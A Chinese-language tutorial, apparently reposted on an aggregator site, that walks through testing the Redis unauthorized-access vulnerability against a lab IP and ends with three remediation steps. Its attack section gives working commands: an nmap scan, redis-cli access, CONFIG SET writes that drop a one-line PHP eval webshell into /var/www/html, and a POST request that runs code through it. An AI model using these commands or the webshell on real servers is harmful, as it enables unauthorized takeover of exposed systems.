Web安全:Redis 未授权访问漏洞 测试.

这篇具有很好参考价值的文章主要介绍了Web安全:Redis 未授权访问漏洞 测试.。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

数据库安全:Redis 未授权访问漏洞 测试.

Redis 默认情况下绑定在 6379 端口,然后如果没有进行添加防火墙规则避免其他非信任来源 IP 访问等相关安全策略,直接暴露在公网上。然后再没有设置密码或者设置了弱密码,因此导致此漏洞的产生.


目录:

Redis 未授权访问漏洞的 危害:

Redis 未授权访问漏洞 测试:

第一步:使用 nmap 工具进行端口扫描.

第二步:查看是否可以连接 Redis 和 获取敏感信息.

第三步:利用 Redis 未授权漏洞上传 程序(木马)

第四步:访问 上传的程序(木马)

第五步:利用 上传的程序(木马)进行连接服务器获取控制权.

Redis 未授权访问漏洞 修复方法:


Redis 未授权访问漏洞的 危害:

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据,可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话,攻击者可以给root账户写入SSH公钥文件,再直接SSH登录目标服务器.

Redis 未授权访问漏洞 测试:

第一步:使用 nmap 工具进行端口扫描.

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379            //扫描 6379 端口是否开放.

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全


第二步:查看是否可以连接 Redis 和 获取敏感信息.

sudo redis-cli -h 192.168.0.101        //连接 Redis 数据库.

info                                   //查看 敏感 信息.

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全


第三步:利用 Redis 未授权漏洞上传 程序(木马)

config set dir /var/www/html        //在网站的根目录/var/www/html下写进去一个脚本.
config set dbfilename bgxg.php        //脚本名称为 bgxg.php
set webshell "<?php @eval($_POST['bgxg']); ?>"        // 脚本内容" 中 "的内容.
save            // 保存 刚刚写入的信息.

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全


第四步:访问 上传的程序(木马)

http://192.168.0.101/bgxg.php        // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo();                      // phpinfo(); 查看服务器的信息.

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全


第五步:利用 上传的程序(木马)进行连接服务器获取控制权.

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全

Web安全:Redis 未授权访问漏洞 测试.,Web安全 领域.,# Web安全 OWASP TOP 10,渗透测试 领域.,数据库,web安全,安全,网络安全


Redis 未授权访问漏洞 修复方法:

(1)Redis 添加密码验证.

(2)禁止外网访问 Redis 端口服务.

(3)修改 Redis 服务 默认端口.

    

     

      文章来源地址https://www.toymoban.com/news/detail-676556.html

到了这里,关于Web安全:Redis 未授权访问漏洞 测试.的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • TWO DAY | WEB安全之OWASP TOP10漏洞

    TWO DAY | WEB安全之OWASP TOP10漏洞 OWASP:开放式Web应用程序安全项目(Open Web Application Security Project),OWASP是一家国际性组织机构,并且是一个开放的、非盈利组织,它致力于协助政府、企业开发、升级各类应用程序以保证其可信任性。所有OWASP的工具、文档、研讨以及所有分会都对

    2024年02月12日
    浏览(27)
  • redis 未授权访问漏洞

    目录 redis 未授权访问漏洞 漏洞描述 漏洞原因: 漏洞危害 漏洞复现: 漏洞复现 写webshell: 写计划任务:centos默认在/var/spool/cron 写ssh公钥实现ssh登录: 漏洞描述: 漏洞原因: 漏洞危害: 1、禁止外部访问redis服务端口 2、禁止使用root权限启动redis服务 3、配置安全组,限制可

    2024年02月13日
    浏览(29)
  • Web漏洞-未授权访问漏洞

    未授权访问漏洞 漏洞介绍: 未授权访问漏洞就是在不需要请求授权的情况下对需要授权的功能进行访问执行,通常是由于认证页面存在缺陷,安全配置不当。 漏洞原理: 未授权访问是系统对用户的限制不全,或者无限制,可以让用户或者限制访问的用户,访问到内部的敏感

    2024年02月16日
    浏览(28)
  • Redis未授权访问漏洞引出的漏洞利用方式

    redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。 redis版本为 4.x/5.0.5 或以前的版本; redis绑定在0.0.0.0:6379,且没有进行添加防火墙规

    2024年02月14日
    浏览(35)
  • Redis未授权访问漏洞搭建复现

    今天我们来学习一下什么是Redis未授权访问漏洞,以及各种利用方法。 文章目录 一、 什么是Redis未授权访问漏洞 二、 Redis环境搭建 三、漏洞利用 四、漏洞总结 五、漏洞防护          Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访

    2024年02月06日
    浏览(40)
  • Redis未授权访问漏洞(一)先导篇

    Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。 如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis以及

    2024年02月15日
    浏览(33)
  • 【vulhub漏洞复现】redis 4-unacc 未授权访问漏洞

    影响版本 Redis 2.x,3.x,4.x,5.x Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴

    2023年04月25日
    浏览(30)
  • 谨防利用Redis未授权访问漏洞入侵服务器

    Redis是一个开源的,由C语言编写的高性能NoSQL数据库,因其高性能、可扩展、兼容性强,被各大小互联网公司或个人作为内存型存储组件使用。 但是其中有小部分公司或个人开发者,为了方便调试或忽略了安全风险,直接用root启动redis,没有设置密码并直接对外开放了6379端口

    2024年02月05日
    浏览(33)
  • redis未授权访问漏洞三种提权方式

    扫描/连接默认的6379端口➢ 利用方式: ⚫ 向Web目录中写shell:需要猜到Web目录地址 ⚫ 写ssh-keygen公钥然后使用私钥登陆 ⚫ 利用crontab反弹shell Redis 是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,

    2024年02月07日
    浏览(31)
  • web渗透测试漏洞复现:Elasticsearch未授权漏洞复现

    Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能

    2024年04月10日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包